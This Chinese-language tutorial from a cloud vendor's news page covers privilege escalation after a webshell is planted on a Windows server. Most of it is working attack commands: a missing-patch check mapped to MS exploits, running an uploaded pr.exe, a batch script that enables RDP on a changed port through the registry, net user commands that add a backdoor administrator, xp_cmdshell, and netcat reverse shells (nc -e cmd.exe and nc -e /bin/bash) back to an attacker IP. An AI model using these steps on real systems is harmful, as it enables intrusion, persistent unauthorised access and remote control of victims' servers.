溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
今天就跟大家聊聊有關基于WebShell的權限提升,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。
一、基于WebShell的提權
1、訪問大馬,查看權限
http://192.168.1.147/dm.asp
2、若果遇到拒絕訪問什么可以上傳一個aspx的大馬,這個權限比較大
http://192.168.1.147/da.aspx
二、window提權
1、查看系統打補丁情況
win2003:
systeminfo>C:Windows\tmp\temp.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:Windows\tmp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:Windows\tmp\temp.txt
通用型:
systeminfo>C:Windows\tmp\temp.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type C:Windows\tmp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:WindowsTemptemp.txt
2、補丁對照表,上傳exe,執行命令
KB952004 :MS09-012 PR
KB956572 :MS09-012 巴西烤肉
KB2393802:MS11-011
KB2592799:MS11-080
KB2621440:MS12-0203
KB2160329:MS10-048
KB970483 :MS09-020 iis6提權(可能是)
KB2124261,KB2271195 MS10-065 IIS7提權(可能是)
KB977165 :MS10-015
KB2360937 MS10-084
KB2478960 MS11-014
KB2507938 MS11-056
KB2566454 MS11-062
KB2646524 MS12-003
KB2645640 MS12-009
KB2641653 MS12-018
KB3077657 MS15_077 字體提權
KB944653 MS07-067
KB952004 MS09-012
KB971657 MS09-041
KB2620712 MS11-097
kb942831 MS08-005
KB2503665 MS11-046
KB2592799 MS11-080
3、由于存在PR提權漏洞,所以上傳一個pr.exe執行
4、一般那些目錄有讀寫權限
日志,緩存、回收站、大馬所在目錄
5、開啟3389,命令行
新建一個bat文件,里面輸入以下內容,上傳到相應目錄
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
命令行執行
/c c:\aiyou\pr.exe "c:\aiyou\3389.bat"
2、用工具開3389端口
3、創建用戶并添加管理員組
net user abc 123 /add
net localgroup administrators abc /add
三、數據庫提權
XP_CMDSHELL開啟方法,新建查詢
四、反彈shell
1、正向連接,主動連接服務器,服務器開啟相應端口
2、反向連接,服務器主動連接我們,我們監聽某一端口
小攻:nc -lvvp 1234
小受(webshell):nc.exe -e cmd.exe 192.168.1.133(小攻ip) 1234
3、獲取權限
4、linux系統nc -e /bin/bash 小攻ip 1234
看完上述內容,你們對基于WebShell的權限提升有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
